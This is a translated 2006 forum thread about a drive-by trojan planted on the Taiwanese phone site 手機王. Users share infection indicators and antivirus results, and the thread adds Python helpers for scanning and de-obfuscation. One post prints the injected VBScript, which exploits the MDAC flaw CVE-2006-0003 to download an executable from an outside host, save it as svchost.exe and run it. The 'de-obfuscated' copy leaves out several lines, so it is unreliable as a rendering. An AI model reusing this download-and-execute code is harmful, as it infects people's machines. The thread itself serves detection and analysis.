手機王 has been injected with a trojan again
hcchen 2006-10-29, 12:18 PM <IFRAME src="http://www.myemage.com/V20/Daren/images/***.***" width=0 height=0></IFRAME>
That page downloads a file named svchost.exe and executes it.
But then an error appears saying svchost.exe is not a valid 32-bit application, and it goes on to download 2.exe.
Purpose of this trojan: unknown
How to tell whether you have been hit:
Check whether C:\Documents and Settings\<username>\Local Settings\Temp contains
svchost.exe
File size: 59.0 KB (60,468 bytes)
Check whether C:\Documents and Settings\<username>\Local Settings\Temporary Internet Files contains
2.exe
File size: 59.0 KB (60,468 bytes)
It creates two files in C:\WINDOWS\system32:
gfile.dll and goodfile.exe
---------------------------------------------------------------------
In short, anyone who has visited 手機王 recently should be careful...
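As an added example (not code from the thread), a small Python sweep that checks the file locations and the 60,468-byte size hcchen lists above; the profile and system-root directories are parameters, and demo() builds a constructed directory tree rather than touching a real machine.

```python
import tempfile
from pathlib import Path

# Indicators taken from hcchen's post: (base, sub-folder, file name, expected byte size or None).
INDICATORS = [
    ("profile", "Local Settings/Temp", "svchost.exe", 60468),
    ("profile", "Local Settings/Temporary Internet Files", "2.exe", 60468),
    ("system", "system32", "gfile.dll", None),
    ("system", "system32", "goodfile.exe", None),
]

def sweep(profile_dir, system_root):
    """Return (path, size, size_matches) for every indicator present on disk."""
    # profile_dir is the user's profile folder (C:\Documents and Settings\<username>),
    # system_root is the Windows folder (C:\WINDOWS). A genuine svchost.exe lives in
    # system32, so any copy in Temp is suspicious whatever its size.
    bases = {"profile": Path(profile_dir), "system": Path(system_root)}
    hits = []
    for base, sub, name, expected in INDICATORS:
        candidate = bases[base] / sub / name
        if candidate.is_file():
            size = candidate.stat().st_size
            hits.append((str(candidate), size, expected is None or size == expected))
    return hits

def demo():
    """Build a constructed profile/system tree holding two of the indicators and sweep it."""
    root = Path(tempfile.mkdtemp())
    profile, system = root / "profile", root / "WINDOWS"
    temp = profile / "Local Settings" / "Temp"
    temp.mkdir(parents=True)
    (temp / "svchost.exe").write_bytes(b"\x00" * 60468)  # constructed: same size as in the post
    (system / "system32").mkdir(parents=True)
    (system / "system32" / "gfile.dll").write_bytes(b"MZ")  # constructed placeholder content
    return sweep(profile, system)

if __name__ == "__main__":
    for path, size, ok in demo():
        print(f"{path}: {size} bytes{'' if ok else ' (size differs from the post)'}")
```

On a real machine call sweep() with the actual profile and C:\WINDOWS paths; a size mismatch still merits a look, since the thread only reports one sample.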
fq4lxx92 2006-10-29, 12:43 PM Luckily I always browse with Firefox; I pulled 2.exe down step by step. Kaspersky 6.0.1.408 (2006/10/29 10:45:45) can't catch it :|||: , but.... just look at the picture.
DarkSkyline 2006-10-29, 12:47 PM Visiting www.sogi.com.tw automatically downloads gfile.dll into the c:\windows\system32\ folder. AntiVir PersonalEdition Premium finds a "HEUR/Malware" virus; everyone please test your own antivirus....^_^
BitDefender 2006-10-29, 02:00 PM BitDefender Antivirus v10 finds the virus
Infected: Dropped:Generic.Lineage.06B7FB77
IE6 on Windows 2000 shows no reaction at all? I didn't find the files above in the system32 and temp directories.
esjustin 2006-10-29, 02:23 PM McAfee's unknown-threat detection can pick it up~:)
Using FF prevents infection...
2.exe
Kaspersky updates really fast
Now detected as Trojan-PSW.Win32.OnLineGames.as
F-Prot 3.16f 10.28.2006 Possibly a new variant of W32/Threat-IKNP-based!Maximus
By the way, doesn't F-Secure have the F-Prot engine? When KAV hasn't been updated yet,
can F-Secure's F-Prot catch it heuristically?
F-Secure users, give it a try..........:D
F-Secure "online scanner" 2.1 doesn't seem to manage it ........ :|||:
(Is there a lag between F-Secure's updates and KAV's?! > <, and F-Secure's F-Prot also..........)
http://MystiPix.com/omeylfjd.jpg
hcchen 2006-10-29, 04:39 PM Microsoft Windows MDAC vulnerability - CVE-2006-0003:
A remote code execution vulnerability exists in the RDS.Dataspace ActiveX control,
which is provided as part of ActiveX Data Objects (ADO) and distributed in MDAC. An attacker
who successfully exploited this vulnerability could take complete control of the affected system. Below is how this vulnerability was used to spread a trojan through a web page
--------------------------------------------------------------------------
Source code of the 手機王 web trojan:
<script language="VBScript">
on error resume next
dl="http://www.myemage.com/V20/Daren/images/*.exe"
j1="clsid:"
j2="BD96"
j3="C556-"
j4="65A3-"
j5="11D0-"
j6="983A-"
j7="00C04FC29E36"
j8=j1&j2&j3&j4&j5&j6&j7
xx="object"
xxx="classid"
xxxx="Scripting.FileSystemObject"
dd="open"
Set df = document.createElement(xx)
df.setAttribute xxx, j8
b4="Mi"
b5="cr"
b6="o"
b7="soft"
b8=".X"
b9="M"
b10="L"
b11="H"
b12="T"
b13="T"
b14="P"
strb1=b4&b5&b6&b7&b8&b9
strb2=b10&b11&b12&b13&b14
strb=strb1&strb2
Set x = df.CreateObject(strb,"")
a4="A"
a5="d"
a6="o"
a7="d"
a8="b"
a9="."
a10="S"
a11="t"
a12="r"
a13="e"
a14="a"
a15="m"
strd1=a4&a5&a6&a7&a8&a9
strd2=a10&a11&a12&a13&a14&a15
strd=strd1&strd2
set SS = df.createobject(strd,"")
SS.type = 1
f4="G"
f5="E"
f6="T"
stre=f4&f5&f6
x.Open stre, dl, False
x.Send
marco1="svchost.exe"
set F = df.createobject(xxxx,"")
tmp2=2
set tmp = F.GetSpecialFolder(tmp2)
SS.open
marco1= F.BuildPath(tmp,marco1)
SS.write x.responseBody
SS.savetofile marco1,2
SS.close
z1="She"
z2="ll.A"
z3="ppli"
z4="cat"
z5="io"
z6="n"
zz=z1&z2&z3&z4&z5&z6
set Q = df.createobject(zz,"")
Q.ShellExecute marco1,"","",dd,0
</script>
De-obfuscated:
<script language="VBScript">
on error resume next
dl="http://www.myemage.com/V20/Daren/images/*.exe"
j8="clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
xx="object"
xxx="classid"
dd="open"
Set df = document.createElement(xx)
df.setAttribute xxx, j8
strb="Microsoft.XMLHTTP"
Set x = df.CreateObject(strb,"")
strd="Adodb.Stream"
set SS = df.createobject(strd,"")
SS.type = 1
stre="GET"
x.Send
marco1="svchost.exe"
set F = df.createobject(xxxx,"")
tmp2=2
set tmp = F.GetSpecialFolder(tmp2)
SS.open
marco1= F.BuildPath(tmp,marco1)
SS.write x.responseBody
SS.close
zz="Shell.Application"
set Q = df.createobject(zz,"")
Q.ShellExecute marco1,"","",dd,0
</script>
http://www.microsoft.com/taiwan/technet/security/bulletin/MS06-014.mspx
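The de-obfuscation hcchen shows above is mechanical: every `name="text"` and `name=a&b&c` line only assembles a string, so a script can evaluate those lines and inline the results. As an added example (not from the thread), a Python pass that does exactly that; SAMPLE is a constructed, shortened script following the same splitting pattern, not the full code from the page.

```python
import re

# Constructed sample (not the full script from the thread): the same string-splitting
# pattern the injected page used, reduced to the CLSID and the XMLHTTP ProgID.
SAMPLE = '''on error resume next
j1="clsid:"
j2="BD96"
j3="C556-65A3-"
j4="11D0-983A-00C04FC29E36"
j8=j1&j2&j3&j4
xx="object"
b4="Mi"
b5="cr"
b6="osoft.XMLHTTP"
strb=b4&b5&b6
Set df = document.createElement(xx)
df.setAttribute "classid", j8
Set x = df.CreateObject(strb,"")
'''

LITERAL = re.compile(r'^\s*(\w+)\s*=\s*"([^"]*)"\s*$')             # name="text"
CONCAT = re.compile(r'^\s*(\w+)\s*=\s*(\w+(?:\s*&\s*\w+)+)\s*$')   # name=a&b&c

def resolve_strings(source):
    """Walk the script once, evaluating literals and & joins; return {name: value}."""
    table = {}
    for line in source.splitlines():
        m = LITERAL.match(line)
        if m:
            table[m.group(1)] = m.group(2)
            continue
        m = CONCAT.match(line)
        if m:
            parts = [p.strip() for p in m.group(2).split("&")]
            if all(p in table for p in parts):  # join only names already resolved
                table[m.group(1)] = "".join(table[p] for p in parts)
    return table

def deobfuscate(source):
    """Drop the string-assembly lines and inline each resolved value where it is used."""
    table = resolve_strings(source)
    out = []
    for line in source.splitlines():
        if LITERAL.match(line) or CONCAT.match(line):
            continue  # nothing runs here; the line only builds a string
        for name, value in table.items():
            line = re.sub(r"\b%s\b" % re.escape(name), lambda _m, v=value: '"%s"' % v, line)
        out.append(line)
    return "\n".join(out)
```

Running deobfuscate(SAMPLE) leaves four lines, with the CLSID and "Microsoft.XMLHTTP" spelled out where they are used; scripts that build strings with Chr() or Replace() need an evaluator rather than this regex pass.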
hwwgo 2006-10-29, 04:53 PM [quotes hcchen's post above in full]
How did you manage to de-obfuscate it?